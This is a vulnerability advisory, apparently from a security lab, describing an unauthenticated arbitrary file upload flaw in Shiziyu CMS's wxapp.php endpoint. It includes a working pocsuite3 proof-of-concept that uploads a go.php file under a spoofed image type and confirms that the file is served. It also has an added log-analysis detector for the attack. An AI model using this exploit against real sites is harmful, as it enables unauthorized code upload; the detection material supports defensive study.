[Vulnerability Reproduction] Shiziyu CMS (狮子鱼CMS) Arbitrary File Upload Vulnerability - Yanyun Lab (燕云实验室)

Yanyun Lab (燕云实验室) 2021-06-28


"Yanyun Lab" (燕云实验室) is a network security offensive and defensive research laboratory founded by Hebei Qiancheng Electronic Technology Co., Ltd. (河北千诚电子科技有限公司). Its main research areas are penetration testing, code auditing, reverse engineering, vulnerability research, CTF competitions, threat intelligence and incident response.



Vulnerability description



The wxapp.php file of Shiziyu CMS contains an arbitrary file upload vulnerability: an attacker can upload malicious files without any authentication.



Affected versions



Shiziyu community group-buying system CMS (狮子鱼社团团购系统CMS)



Reproduction







POC



    #!/usr/bin/env python
    # coding: utf-8
    from urllib.parse import urlparse
    from pocsuite3.api import requests as req
    from pocsuite3.api import register_poc
    from pocsuite3.api import Output, POCBase
    from pocsuite3.api import POC_CATEGORY, VUL_TYPE
    import hashlib
    import random
    import string


    class TestPOC(POCBase):
        vulID = '67'
        version = '1'
        author = 'zhzyker'
        vulDate = '2015-06-14'
        createDate = '2021-06-14'
        updateDate = '2021-06-14'
        references = ['https://github.com/zhzyker/vulmap']
        name = 'shiziyu CMS wxapp.php arbitrary file upload vulnerability'
        appName = 'Shiziyu CMS'
        appVersion = 'unknown'
        vulType = VUL_TYPE.CODE_EXECUTION
        category = POC_CATEGORY.EXPLOITS.REMOTE
        desc = '''
        shiziyu CMS wxapp.php arbitrary file upload vulnerability
        '''

        def _verify(self):
            result = {}
            pr = urlparse(self.url)
            # Use the port from the target URL, falling back to 8080.
            if pr.port:
                ports = [pr.port]
            else:
                ports = [8080]
            for port in ports:
                target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                TIMEOUT = 10
                # Random marker: its MD5 is written into the uploaded file and looked
                # for afterwards to confirm the file was stored and is being served.
                st = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
                md = hashlib.md5(st.encode('utf-8')).hexdigest()
                headers = {
                    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
                    'Content-Type': 'multipart/form-data; boundary=----7d33a816d302b6',
                }
                # Hand-built multipart body for the "upfile" field of the upload endpoint.
                data = '------7d33a816d302b6\n'
                data += 'Content-Disposition: form-data; name="upfile"; filename="go.php"\n'
                data += 'Content-Type: image/gif\n\n'
                data += md
                data += '\n\n------7d33a816d302b6--'

                try:
                    self.request = req.post(self.url + "/wxapp.php?controller=Goods.doPageUpload", data=data, headers=headers, timeout=TIMEOUT, verify=False)
                    resp = self.request.json()
                    # The CMS answers with the URL of the stored file in "image_o".
                    shell_url = resp.get('image_o')
                    self.request = req.get(shell_url, headers=headers, timeout=TIMEOUT, verify=False)
                    if md in self.request.text and self.request.status_code == 200:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = self.url
                        result['VerifyInfo']['UPLOAD'] = shell_url
                        break
                except Exception:
                    pass
            return self.parse_output(result)

        def _attack(self):
            return self._verify()

        def parse_output(self, result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('not vulnerability')
            return output


    register_poc(TestPOC)
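From the defender's side, the pattern the POC exercises (an unauthenticated POST to wxapp.php with controller=Goods.doPageUpload, followed by a request for the stored file) can be picked out of web-server access logs. The following is an added example, not code from the original post or from the CMS; it assumes Apache/nginx combined-format logs and an upload directory under /uploads/ or /upload/ (both assumptions), and the log lines it contains are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" access log; only the leading fields are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_CONTROLLER = "Goods.doPageUpload"   # endpoint named in the advisory
UPLOAD_DIRS = ("/uploads/", "/upload/")    # assumption: where this install stores user files

def parse_line(line):
    """Fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def is_upload_call(rec):
    """POST to wxapp.php whose controller parameter selects the upload action."""
    u = urlparse(rec["path"])
    return (rec["method"] == "POST" and u.path.endswith("/wxapp.php")
            and UPLOAD_CONTROLLER in parse_qs(u.query).get("controller", []))

def is_script_from_upload_dir(rec):
    """A .php file executed (HTTP 200) out of a directory meant for static uploads."""
    p = urlparse(rec["path"]).path.lower()
    return (rec["status"] == 200 and p.endswith(".php")
            and any(d in p for d in UPLOAD_DIRS))

def find_suspects(lines):
    """Map source IP -> (upload calls, executed script paths) for IPs that did both."""
    uploads, scripts = Counter(), {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_upload_call(rec):
            uploads[rec["ip"]] += 1
        elif is_script_from_upload_dir(rec):
            scripts.setdefault(rec["ip"], []).append(urlparse(rec["path"]).path)
    return {ip: (uploads[ip], paths) for ip, paths in scripts.items() if uploads[ip]}

# Constructed sample: one client uploads then fetches the stored script; the other only browses.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Jun/2021:10:01:02 +0800] "POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1" 200 118',
    '203.0.113.7 - - [28/Jun/2021:10:01:03 +0800] "GET /uploads/go.php HTTP/1.1" 200 32',
    '198.51.100.4 - - [28/Jun/2021:10:02:00 +0800] "GET /index.php HTTP/1.1" 200 2048',
]
```

Any PHP file answered with 200 from an upload directory is worth a look on its own; requiring the preceding upload call from the same source simply raises the confidence of the alert.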



